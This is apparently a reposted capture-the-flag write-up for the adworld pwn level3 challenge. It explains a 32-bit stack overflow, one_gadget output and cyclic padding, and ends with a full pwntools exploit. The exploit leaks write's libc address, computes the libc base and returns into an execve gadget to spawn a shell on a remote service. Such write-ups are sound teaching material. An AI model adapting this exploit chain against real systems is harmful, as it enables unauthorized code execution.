Simple stack overflow with execve | 攻防世界 (adworld) newbie area level3

Preface

There was still one challenge left over in the pwn newbie area, this level3; as far as I remember I did not finish it back then because the remote service could not be reached. I also recall that no library was provided at the time, but now a libc_32.so.6 is given.

0x00. Checking protections

devil@ubuntu:~/adworld/pwn$ checksec level3 
[*] '/home/devil/adworld/pwn/level3'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found   ;stack overflow is possible
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

0x01. The stack overflow

The read call has an obvious stack overflow, but the binary itself contains no system("/bin/sh"), so the overflow alone cannot give a shell.

0x02. one_gadget

Since I learned to use one_gadget, it has worked every time on challenges that ship their libc.
For a hands-on walkthrough of one_gadget, see here.

devil@ubuntu:~/adworld/pwn$ one_gadget libc_32.so.6
0x3a80c execve("/bin/sh", esp+0x28, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x28] == NULL

0x3a80e execve("/bin/sh", esp+0x2c, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x2c] == NULL

0x3a812 execve("/bin/sh", esp+0x30, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x30] == NULL

0x3a819 execve("/bin/sh", esp+0x34, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x34] == NULL

0x5f065 execl("/bin/sh", eax)
constraints:
  esi is the GOT address of libc
  eax == NULL

0x5f066 execl("/bin/sh", [esp])
constraints:
  esi is the GOT address of libc
  [esp] == NULL

Use one_gadget to obtain the execve gadget address (its offset within libc):

execve = 0x3a80c

Note:
cyclic reports that the overflow needs 144 bytes, but note that 144 is the distance from the input to esp-4 (padding = 144-4). If junk = "A"*144, the program will crash when the payload runs.
For example:

A: aaaa
B: aaab
C: aaac
D: aaad
cyclic -l aaaa = 4
cyclic -l aaad = 16

144-4 is the distance from the input position to esp.
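To make the 144-versus-140 question checkable rather than a matter of remembering which convention a tool reports, here is an added example (not code from the original write-up) that re-implements the de Bruijn "cyclic" pattern that pwntools' `cyclic` and `cyclic -l` use, in plain Python. `cyclic_find` returns the index at which the 4-byte window starts, so that index is exactly the number of padding bytes in front of the saved return address; a tool that reports where the window ends instead gives a value 4 larger, which is the subtraction the note above describes. The crash value is constructed with `simulate_crash`; nothing here touches a real process.

```python
# Added example (not from the original write-up): pure-Python re-implementation of the
# de Bruijn "cyclic" pattern that pwntools' `cyclic` / `cyclic -l` use. All values are
# constructed for the demonstration; no real process is involved.
from itertools import islice

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"   # pwntools' default alphabet
N = 4                                      # 32-bit target: every 4-byte window is unique


def de_bruijn(alphabet=ALPHABET, n=N):
    """Yield the de Bruijn sequence B(k, n) byte by byte (Lyndon-word construction)."""
    k = len(alphabet)
    a = [0] * k * n

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length, alphabet=ALPHABET, n=N):
    """First `length` bytes of the pattern (what `cyclic 200` prints)."""
    return bytes(islice(de_bruijn(alphabet, n), length))


def cyclic_find(value, alphabet=ALPHABET, n=N, max_length=0x10000):
    """Index at which the n-byte window `value` STARTS in the pattern, or -1.

    `value` may be the raw bytes or the integer a debugger shows in EIP; an
    integer is converted little-endian because that is how it was loaded from
    the stack. The index equals the number of bytes in front of the window,
    i.e. the padding needed to reach the saved return address.
    """
    if isinstance(value, int):
        value = value.to_bytes(n, "little")
    if len(value) != n:
        raise ValueError(f"need exactly {n} bytes, got {len(value)}")
    window = bytearray()
    for idx, b in enumerate(islice(de_bruijn(alphabet, n), max_length)):
        window.append(b)
        if len(window) > n:
            del window[0]
        if len(window) == n and bytes(window) == value:
            return idx - n + 1
    return -1   # not from the pattern: EIP was not overwritten by this input


def simulate_crash(padding_to_ret, pattern_len=200):
    """Constructed stand-in for a crash: the saved return address receives whatever
    pattern bytes land `padding_to_ret` bytes into the input."""
    pattern = cyclic(pattern_len)
    return int.from_bytes(pattern[padding_to_ret:padding_to_ret + N], "little")


if __name__ == "__main__":
    eip = simulate_crash(140)        # pretend the debugger showed this EIP value
    print(hex(eip), cyclic_find(eip))  # window starts at index 140 -> junk is 140 bytes
```

Feeding the crashing EIP value straight into `cyclic_find` is the same as `cyclic -l 0x...`; a return value of -1 is the useful failure mode, since it means the control-flow value did not come from the pattern at all.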

0x03. Approach

1. To run execve we first need the libc load offset (its base) in order to compute execve_addr.
2. Use the overflow to run execve and get a shell.
3. Use write(1, addr, 4) to leak the runtime address of write; that gives the libc offset, and from it the execve address.
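The arithmetic behind steps 1 and 3, as an added example that is not part of the original write-up: parse the 4 leaked bytes, derive the libc base, and relocate the one_gadget offset. The `write` symbol offset and the leaked bytes are constructed stand-ins (the real offset comes from `libc.symbols['write']`); the one_gadget offset 0x3a80c is the one the page reports. The page-alignment check is the cheap way to catch the usual mistake of unpacking the wrong bytes or using offsets from a different libc build.

```python
# Added example (not from the original write-up): leak-to-gadget arithmetic with the
# sanity checks a misparsed leak would trip. Offsets and leaked bytes are constructed.
import struct

PAGE = 0x1000
ONE_GADGET = 0x3a80c      # execve gadget offset reported by one_gadget (from the page)
WRITE_OFF = 0x000d43c0    # CONSTRUCTED stand-in for libc.symbols['write']


def parse_leak(raw: bytes) -> int:
    """write(1, write_got, 4) sends exactly 4 little-endian bytes (the runtime address
    of write). Anything shorter means the chain failed or the read returned early."""
    if len(raw) < 4:
        raise ValueError(f"leak too short: {raw!r}")
    return struct.unpack("<I", raw[:4])[0]


def libc_base(write_addr: int, write_off: int = WRITE_OFF) -> int:
    """Runtime base = leaked address - that symbol's offset within libc. A mapped
    shared object always starts on a page boundary, so an unaligned result means
    the wrong bytes were unpacked or the offset came from a different libc."""
    base = write_addr - write_off
    if base & (PAGE - 1):
        raise ValueError(f"libc base {base:#x} is not page-aligned: wrong leak or wrong libc")
    return base


def gadget_addr(base: int, gadget_off: int = ONE_GADGET) -> int:
    """Relocate a libc-relative offset (a one_gadget or any symbol) into the process."""
    return base + gadget_off


def resolve_from_leak(raw: bytes) -> int:
    """The whole pipeline the second stage of the exploit relies on."""
    return gadget_addr(libc_base(parse_leak(raw)))


if __name__ == "__main__":
    # Constructed leak: libc mapped at 0xf7e00000, so write sits at 0xf7ed43c0.
    # The bytes after the first 4 stand in for the prompt that follows the leak.
    leaked = struct.pack("<I", 0xf7ed43c0) + b"Input:\n"
    print(hex(resolve_from_leak(leaked)))   # 0xf7e3a80c
```

Note that this only relocates the gadget; the one_gadget constraints listed above ([esp+0x28] == NULL and so on) depend on the stack contents at the moment of the return and are not something this arithmetic can verify.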

0x04. Exploit (exp)

from pwn import *
p = remote("111.198.29.45", 37840)
elf = ELF("./level3")
libc = ELF("./libc_32.so.6")
context(log_level='debug', arch='i386', os='linux')
execve = 0x3a80c  # one_gadget execve offset within libc
junk = b"A" * 140  # padding up to the saved return address (bytes, for Python 3 pwntools)
main_addr = elf.symbols['main']
write_got = elf.got['write']
write_plt = elf.plt['write']
# Stage 1: return into write@plt with args (1, write_got, 4) to leak write's runtime
# address, then return to main so the overflow can be triggered a second time
payload1 = junk + p32(write_plt) + p32(main_addr)
payload1 += p32(1) + p32(write_got) + p32(4)
p.recv()
p.sendline(payload1)
data = p.recv()[:4]
write_addr = u32(data)
offset = write_addr - libc.symbols['write']  # libc load offset (base)
execve_addr = offset + execve
# Stage 2: overflow again and return straight into the one_gadget
payload = junk + p32(execve_addr)
p.sendlineafter(b"Input:\n", payload)
p.interactive()


Reposted from blog.csdn.net/weixin_43092232/article/details/105109275